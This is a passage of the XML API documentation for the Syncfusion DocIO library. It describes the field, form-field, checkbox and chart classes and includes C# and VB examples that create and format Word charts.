            Gets the type of the entity. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.FieldPattern">
            <summary>
            Gets or sets field pattern.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.FieldValue">
            <summary>
            Gets the field value. Read-only.
            </summary>
            <value>The field value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.FieldType">
            <summary>
            Gets or sets field type.
            </summary>
            <value>the <see cref="P:Syncfusion.DocIO.DLS.WField.FieldType"/> represents the type of the field.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.IsLocal">
            <summary>
            Is Local Hyperlink
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.FormattingString">
            <summary>
            Gets the formatting string.
            </summary>
            <value>The formatting string.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.LocalReference">
            <summary>
            Gets the local reference for the hyperlink.
            </summary>
            <value>The local reference.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.FieldCode">
            <summary>
            Gets or sets the field code.
            </summary>
            <value>The field code information used to evaluate the resultant value of the field.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.SourceFieldType">
            <summary>
            Gets or sets the type of the source field.
            </summary>
            <value>The type of the source field.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.FieldResult">
            <summary>
            Gets or sets the field result.
            </summary>
            <value>The field result.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.Range">
            <summary>
            Gets the range.
            </summary>
            <value>The range.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.FieldSeparator">
            <summary>
            Gets or sets the field separator.
            </summary>
            <value>The field separator.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.FieldEnd">
            <summary>
            Gets or sets the field end.
            </summary>
            <value>The field end.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.IsCloned">
            <summary>
            Gets or sets a value indicating whether the instance is cloned.
            </summary>
            <value>
              <c>true</c> if the instance is cloned; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.IsAdded">
            <summary>
            Gets or sets a value indicating whether the instance is added.
            </summary>
            <value>
              <c>true</c> if  the instance is added; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.IsFieldRangeUpdated">
            <summary>
            Gets or sets a value indicating whether field range updated.
            </summary>
            <value>
            <c>true</c> if field range updated; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.IsFieldSeparator">
            <summary>
            Gets or sets a value indicating whether is field separator.
            </summary>
            <value>
              <c>true</c> if is field separator; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.IsSkip">
            <summary>
            Gets or sets a value indicating whether skip the instance.
            </summary>
            <value>
              <c>true</c> if skip the instance; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.IsUpdated">
            <summary>
            Gets or sets a value indicating whether the instance is updated.
            </summary>
            <value>
              <c>true</c> if the instance is updated; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.IsInFieldResult">
            <summary>
            Check whether field is nested field and Inside the field separator
            </summary>
            <value>
            if the field is inside the field separator, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.IsNumPagesInsideExpressionField">
            <summary>
            Gets or sets a value indicating whether this instance is number pages inside expression field.
            </summary>
            <value>
            <c>true</c> if this instance is number pages inside expression field; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.IsNumPageUsedForEvaluation">
            <summary>
            Gets or sets a value indicating whether this instance is number page used for evaluation.
            </summary>
            <value>
            <c>true</c> if this instance is number page used for evaluation; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.IsFieldInsideUnknownField">
            <summary>
            Gets or sets a value indicating whether this instance is field inside unknown field.
            </summary>
            <value>
            <c>true</c> if this instance is field inside unknown field; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.ResultFormat">
            <summary>
            Gets the result format.
            </summary>
            <value>
            The result format.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.Text">
            <summary>
            Gets or sets the text.
            </summary>
            <value>The <b>string</b> that specifies the text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WField.IsFieldWithoutSeparator">
            <summary>
            Check Whether the current field contain field separator or not
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WField.Month">
            <summary>
            Month
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WFormField.DEF_VALUE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WFormField.m_curFormFieldType">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WFormField.m_bHasFFData">
            <summary>
            Specifies whether the field has Form field data.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFormField.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WFormField"/> class.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFormField.#ctor(Syncfusion.DocIO.DLS.WFormField,Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WFormField"/> class.
            </summary>
            <param name="formField">The form field.</param>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFormField.CloneImpl">
            <summary>
            Clones itself.
            <exclude/>
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFormField.CreateLayoutInfo">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFormField.AttachToParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Attaches to paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="itemPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFormField.Detach">
            <summary>
            Detaches from owner.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFormField.AttachForTextBody(Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Attaches for text body.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFormField.DetachForTextBody(Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Detaches for text body.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFormField.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFormField.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFormField.ApplyNewBookmarkName(System.String,System.String)">
            <summary>
            Applies the new name of the bookmark.
            </summary>
            <param name="oldName">The old name.</param>
            <param name="newName">The new name.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFormField.ApplyInDocBkmkColl(System.String,System.String)">
            <summary>
            Applies new bookmark name in bookmark collection of document.
            </summary>
            <param name="oldName">The old name.</param>
            <param name="newName">The new name.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFormField.ApplyInOwnerParaColl(System.String,System.String)">
            <summary>
            Applies the in owner para collection.
            </summary>
            <param name="oldName">The old name.</param>
            <param name="newName">The new name.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WFormField.CheckFormFieldName(System.String)">
            <summary>
            Checks if collection of bookmarks in document contains bookmark with specified name.
            </summary>
            <param name="newName">The new name.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFormField.FormFieldType">
            <summary>
            Gets type of this form field.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFormField.Name">
            <summary>
            Gets/sets form field title name (bookmark name).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFormField.Help">
            <summary>
            Gets/sets form field help.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFormField.StatusBarHelp">
            <summary>
            Gets or sets the status bar help.
            </summary>
            <value>The status bar help.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFormField.MacroOnStart">
            <summary>
            Gets / sets the name of macros on start
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFormField.MacroOnEnd">
            <summary>
            Gets / sets the name of macros on end
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFormField.Value">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFormField.Params">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFormField.Enabled">
            <summary>
            Gets or sets Enabled property (true if form field enabled).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFormField.CalculateOnExit">
            <summary>
            Gets/sets calculate on exit property.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WFormField.HasFFData">
            <summary>
            Gets or sets a value indicating whether this instance has form field data.
            </summary>
            <value>
            	<c>true</c> if this instance has form field data; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCheckBox.m_checkBoxSize">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCheckBox.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WCheckBox"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCheckBox.CloneImpl">
            <summary>
            Creates a duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>A reference to the newly created instance.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCheckBox.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCheckBox.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCheckBox.SetCheckBoxSize(System.Int32)">
            <summary>
            Sets the size of the CheckBox.
            </summary>
            <param name="checkBoxSize">Size of the check box.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCheckBox.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCheckBox.GetCheckBoxSize(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            Gets the size of the CheckBox.
            </summary>
            <param name="dc">The dc.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCheckBox.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCheckBox.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCheckBox.CheckBoxSize">
            <summary>
            Gets or sets the size of the checkbox.
            </summary>
            <value>The <b>integer </b>that specifies the size of checkbox.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCheckBox.DefaultCheckBoxValue">
            <summary>
            Gets or sets value indicating whether by default the checkbox is checked or not.
            </summary>
            <value><b>True</b> if the checked box is checked by default; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCheckBox.Checked">
            <summary>
            Gets or sets a value indicating whether the the checkbox is checked.
            </summary>
            <value><b>True</b> if the checked box is checked; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCheckBox.SizeType">
            <summary>
            Gets or sets the type of the checkbox size.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.CheckBoxSizeType"/> member that specifies the checkbox size type.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WChart">
            <summary>
            Represents the chart in the Word document.
            </summary>
            <remarks>This class, its properties and methods are not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin applications.</remarks>
            <example>The following code illustrates how to create a new chart.
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Input data for chart
                Dim data As Object()() = New Object(5)() {}
                For i As Integer = 0 To 5
                    data(i) = New Object(2) {}
                Next
                data(0)(0) = ""
                data(1)(0) = "Gravad lax"
                data(2)(0) = "Louisiana Hot spiced Okara"
                data(3)(0) = "Mascarpone Fabioli"
                data(4)(0) = "Wimmers gute SemmelKnodel"
                data(5)(0) = "Maxilaku"
                data(0)(1) = "Sum of Purchases"
                data(1)(1) = 286
                data(2)(1) = 680
                data(3)(1) = 288
                data(4)(1) = 200
                data(5)(1) = 731
                data(0)(2) = "Sum of Future Expenses"
                data(1)(2) = 1300
                data(2)(2) = 700
                data(3)(2) = 1280
                data(4)(2) = 1200
                data(5)(2) = 2660
                'Create and Append chart to the paragraph
                Dim chart As WChart = paragraph.AppendChart(data, 470, 300)
                'Set chart type and title
                chart.ChartType = OfficeChartType.Column_Clustered
                chart.ChartTitle = "Purchase Details"
                chart.ChartTitleArea.FontName = "Calibri"
                chart.ChartTitleArea.Size = 14
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None
                chart.PrimaryCategoryAxis.Title = "Products"
                chart.PrimaryValueAxis.Title = "In Dollars"
                'Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom
                'Save the document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WChart.m_officeChart">
            <summary>
            OfficeChart object to hold chart elements
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WChart.AttachToParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Attaches to paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="itemPos">The item pos.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WChart.Detach">
            <summary>
            Detaches from owner.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WChart.CloneImpl">
            <summary>
            Creates a duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>A reference to the newly created object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WChart.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            
            </summary>
            <param name="doc"></param>
            <param name="nextOwner"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WChart.Close">
            <summary>
            Clears the object
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WChart.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WChart"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WChart.CreateDataHolder">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WChart.SetDataRange(System.Int32,System.String)">
            <summary>
            Set chart data from excel file
            </summary>
            <param name="sheetNumber">Worksheet number that has data for chart</param>
            <param name="dataRange">Data ranga in the worksheet that has chart data</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WChart.InitializeOfficeChartToImageConverter">
            <summary>
            Initialize the CharToImageConverter
            </summary>
            <param name="chart">Current chart</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WChart.SetChartData(System.Object[][])">
            <summary>
            Sets the data for the chart from the specified <see cref="T:System.Object"/> collection.
            </summary>
            <param name="data">An <see cref="T:System.Object"/> that represents the two dimensional array.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WChart.SetDataRange(System.Object[][],System.Int32,System.Int32)">
            <summary>
            Sets the data for the chart from the specified <see cref="T:System.Object"/> collection with the row index and column index.
            </summary>
            <param name="data">An <see cref="T:System.Object"/> that represents the two dimensional array.</param>
            <param name="rowIndex">The <b>integer</b> that specifies the row of the first cell where array should be imported.</param>
            <param name="columnIndex">The <b>integer</b> that specifies the column of the first cell where array should be imported.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WChart.SetDataRange(System.Collections.IEnumerable,System.Int32,System.Int32)">
            <summary>
            Sets the data for the chart from the specified <see cref="T:System.Collections.IEnumerable"/> collection with the row index and column index.
            </summary>
            <param name="enumerable">An <see cref="T:System.Collections.IEnumerable"/> object with desired data.</param>
            <param name="rowIndex">The <b>integer</b> that specifies the row of the first cell where array should be imported.</param>
            <param name="columnIndex">The <b>integer</b> that specifies the column of the first cell where array should be imported.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WChart.Refresh">
            <summary>
            Replaces the chart data with the worksheet data.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WChart.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WChart.Syncfusion#Layouting#ILeafWidget#Measure(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            Measures the size of chart
            </summary>
            <param name="dc"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.OfficeChart">
            <summary>
            Gets or sets officechart data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.Workbook">
            <summary>
            Gets or sets workbook data
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.ChartType">
            <summary>
            Gets or sets the type of the chart
            </summary>
            <value>The <see cref="T:Syncfusion.OfficeChart.OfficeChartType"/> member that specifies the type of chart.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.DataRange">
            <summary>
            Gets or sets <see cref="!:http://www.google.com">IOfficeDataRange</see> of the chart data.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.IsSeriesInRows">
            <summary>
            Gets or sets value indicating whether chart series are represented as rows.
            </summary>
            <value><b>True</b> if the series are represented as rows; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.ChartTitle">
            <summary>
            Gets or sets the title of the chart.
            </summary>
            <value>The <b>string </b> that specifies the chart title.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.ChartTitleArea">
            <summary>
            Gets the <see cref="!:http://www.google.com">IOfficeChartTextArea</see> of the chart. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.Series">
            <summary>
            Gets collection of <see cref="!:http://www.google.com">IOfficeChartSeries</see> present in the chart. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.PrimaryCategoryAxis">
            <summary>
            Gets the primary category axis of the chart. Read-only.
            </summary>
            <value>The <see cref="!:http://www.google.com">IOfficeChartCategoryAxis</see> instance that specifies the primary category axis.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.PrimaryValueAxis">
            <summary>
            Gets the primary value axis of the chart. Read-only.
            </summary>
            <value>The <see cref="!:http://www.google.com">IOfficeChartValueAxis</see> instance that specifies the primary value axis.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.PrimarySeriesAxis">
            <summary>
            Gets the primary series axis of the chart. Read-only.
            </summary>
            <value>The <see cref="!:http://www.google.com">IOfficeChartSeriesAxis</see> instance that specifies the primary series axis.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.SecondaryCategoryAxis">
            <summary>
            Gets the secondary category axis of the chart. Read-only.
            </summary>
            <value>The <see cref="!:http://www.google.com">IOfficeChartCategoryAxis</see> instance that specifies the secondary category axis.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.SecondaryValueAxis">
            <summary>
            Gets the secondary value axis of the chart. Read-only.
            </summary>
            <value>The <see cref="!:http://www.google.com">IOfficeChartValueAxis</see> instance that specifies the secondary value axis.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.ChartArea">
            <summary>
            Gets the chart area. Read-only.
            </summary>
            <example>The following code illustrates how to apply the formatting for chart area.
            <code lang ="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Get the paragraph
                WParagraph paragraph = document.LastParagraph;
                //Get the chart entity
                WChart chart = paragraph.ChildEntities[1] as WChart;
                //Format chart area.
                IOfficeChartFrameFormat chartArea = chart.ChartArea;
                //Set border line pattern, color, line weight
                chartArea.Border.LinePattern = OfficeChartLinePattern.Solid;
                chartArea.Border.LineColor = Color.Blue;
                chartArea.Border.LineWeight = OfficeChartLineWeight.Hairline;
                //Set fill type and fill colors
                chartArea.Fill.FillType = OfficeFillType.Gradient;
                chartArea.Fill.GradientColorType = OfficeGradientColor.TwoColor;
                chartArea.Fill.BackColor = Color.FromArgb(205, 217, 234);
                chartArea.Fill.ForeColor = Color.White;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                'Get the paragraph
                Dim paragraph As WParagraph = document.LastParagraph
                'Get the chart entity
                Dim chart As WChart = TryCast(paragraph.ChildEntities(1), WChart)
                'Format chart area.
                Dim chartArea As IOfficeChartFrameFormat = chart.ChartArea
                'Set border line pattern, color, line weight
                chartArea.Border.LinePattern = OfficeChartLinePattern.Solid
                chartArea.Border.LineColor = Color.Blue
                chartArea.Border.LineWeight = OfficeChartLineWeight.Hairline
                'Set fill type and fill colors
                chartArea.Fill.FillType = OfficeFillType.Gradient
                chartArea.Fill.GradientColorType = OfficeGradientColor.TwoColor
                chartArea.Fill.BackColor = Color.FromArgb(205, 217, 234)
                chartArea.Fill.ForeColor = Color.White
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.PlotArea">
            <summary>
            Gets the plot area of the chart. Read-only.
            </summary>
            <example>The following code illustrates how to apply the formatting for plot area.
            <code lang = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                WParagraph paragraph = document.LastParagraph;
                //Get the chart entity
                WChart chart = paragraph.ChildEntities[0] as WChart;
                //Set border settings - line color, pattern, weight, transparency
                chart.PlotArea.Border.AutoFormat = false;
                chart.PlotArea.Border.IsAutoLineColor = false;
                chart.PlotArea.Border.LineColor = Color.Blue;
                chart.PlotArea.Border.LinePattern = OfficeChartLinePattern.DashDot;
                chart.PlotArea.Border.LineWeight = OfficeChartLineWeight.Wide;
                chart.PlotArea.Border.Transparency = 0.6;
                //Set the plot area’s fill type, color
                chart.PlotArea.Fill.FillType = OfficeFillType.SolidColor;
                chart.PlotArea.Fill.ForeColor = Color.LightPink;
                //Set the plot area shadow presence
                chart.PlotArea.Shadow.ShadowInnerPresets = Office2007ChartPresetsInner.InsideDiagonalTopLeft;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                Dim paragraph As WParagraph = document.LastParagraph
                'Get the chart entity
                Dim chart As WChart = TryCast(paragraph.ChildEntities(0), WChart)
                'Set border settings - line color, pattern, weight, transparency
                chart.PlotArea.Border.AutoFormat = False
                chart.PlotArea.Border.IsAutoLineColor = False
                chart.PlotArea.Border.LineColor = Color.Blue
                chart.PlotArea.Border.LinePattern = OfficeChartLinePattern.DashDot
                chart.PlotArea.Border.LineWeight = OfficeChartLineWeight.Wide
                chart.PlotArea.Border.Transparency = 0.6
                'Set the plot area’s fill type, color
                chart.PlotArea.Fill.FillType = OfficeFillType.SolidColor
                chart.PlotArea.Fill.ForeColor = Color.LightPink
                'Set the plot area shadow presence
                chart.PlotArea.Shadow.ShadowInnerPresets = Office2007ChartPresetsInner.InsideDiagonalTopLeft
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.Walls">
            <summary>
            Gets the walls of the chart. Read-only.
            </summary>
            <remarks>The 3D charts, stacked charts and clustered charts only can have walls.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.SideWall">
            <summary>
            Gets the side wall of the chart. Read-only.
            </summary>
            <example>The following code illustrates how to specify side wall formatting.
            <code lang = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the excel file as stream
                Stream excelStream = File.OpenRead("Excel_Template.xlsx");
                //Create and Append chart to the paragraph with excel stream as parameter
                WChart chart = paragraph.AppendChart(excelStream, 1, "B2:C6", 470, 300);
                //Set chart type and title
                chart.ChartType = OfficeChartType.Column_Clustered_3D;
                chart.ChartTitle = "Purchase Details";
                chart.ChartTitleArea.FontName = "Calibri";
                chart.ChartTitleArea.Size = 14;
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None;          
                //Set name to chart series            
                chart.Series[0].Name = "Sum of Purchases";
                chart.Series[1].Name = "Sum of Future Expenses";
                chart.PrimaryCategoryAxis.Title = "Products";
                chart.PrimaryValueAxis.Title = "In Dollars";
                //Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom;
                //Set roatation and elevation values
                chart.Rotation = 20;
                chart.Elevation = 15;
                //Set side wall properties
                chart.SideWall.Fill.FillType = OfficeFillType.SolidColor;
                chart.SideWall.Fill.ForeColor = Color.White;
                chart.SideWall.Fill.BackColor = Color.White;
                chart.SideWall.Border.LineColor = System.Drawing.Color.Beige;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the excel file as stream
                Dim excelStream As Stream = File.OpenRead("Excel_Template.xlsx")
                'Create and Append chart to the paragraph with excel stream as parameter
                Dim chart As WChart = paragraph.AppendChart(excelStream, 1, "B2:C6", 470, 300)
                'Set chart type and title
                chart.ChartType = OfficeChartType.Column_Clustered_3D
                chart.ChartTitle = "Purchase Details"
                chart.ChartTitleArea.FontName = "Calibri"
                chart.ChartTitleArea.Size = 14
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None
                'Set name to chart series            
                chart.Series(0).Name = "Sum of Purchases"
                chart.Series(1).Name = "Sum of Future Expenses"
                chart.PrimaryCategoryAxis.Title = "Products"
                chart.PrimaryValueAxis.Title = "In Dollars"
                'Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom
                'Set rotation and elevation values
                chart.Rotation = 20
                chart.Elevation = 15
                'Set side wall properties
                chart.SideWall.Fill.FillType = OfficeFillType.SolidColor
                chart.SideWall.Fill.ForeColor = Color.White
                chart.SideWall.Fill.BackColor = Color.White
                chart.SideWall.Border.LineColor = System.Drawing.Color.Beige
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <remarks>The 3D charts, stacked charts and clustered charts only can have side walls.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.BackWall">
            <summary>
            Gets the back wall of the chart. Read-only.
            </summary>
            <example>The following code illustrates how to specify back wall formatting.
            <code lang = "C#">
